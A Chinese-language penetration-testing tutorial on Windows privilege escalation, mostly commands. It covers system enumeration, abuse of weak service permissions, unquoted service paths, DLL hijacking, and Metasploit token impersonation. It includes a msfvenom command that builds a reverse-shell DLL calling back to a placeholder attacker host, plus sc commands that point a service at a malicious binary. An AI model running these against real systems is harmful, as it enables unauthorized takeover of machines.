Windows权限提升：从普通用户到SYSTEM

前言#

获取初始权限只是渗透的开始。多数情况下，低权限用户能做的事情非常有限，提权是继续进行下去的必经之路。

信息收集#

提权前需要全面了解当前环境：

# 系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# 补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn

# 用户与权限
whoami /priv
whoami /groups

# 网络情况
ipconfig /all
route print
netstat -ano

# 计划任务
schtasks /query /fo LIST /v

服务配置错误#

不安全的服务权限#

当普通用户对服务有修改权限时，可以将服务路径指向恶意程序：

# 检查服务权限
accesschk.exe -uwcqv "Authenticated Users" *

# 修改服务配置
sc config VulnService binPath= "C:\temp\shell.exe"
sc start VulnService

无引号服务路径#

# 检查无引号路径
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

DLL 劫持#

# 使用 Process Monitor 监控缺失 DLL
# Filter: Path ends with .dll, Result is NAME NOT FOUND

# 编译恶意 DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f dll -o hijack.dll

令牌窃取#

# 使用 Incognito 模块（MSF）
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

总结#

Windows 提权的方法非常多，关键在于充分的信息收集和耐心枚举。建议建立自己的提权检查清单，每次获取立足点后按照清单逐一排查。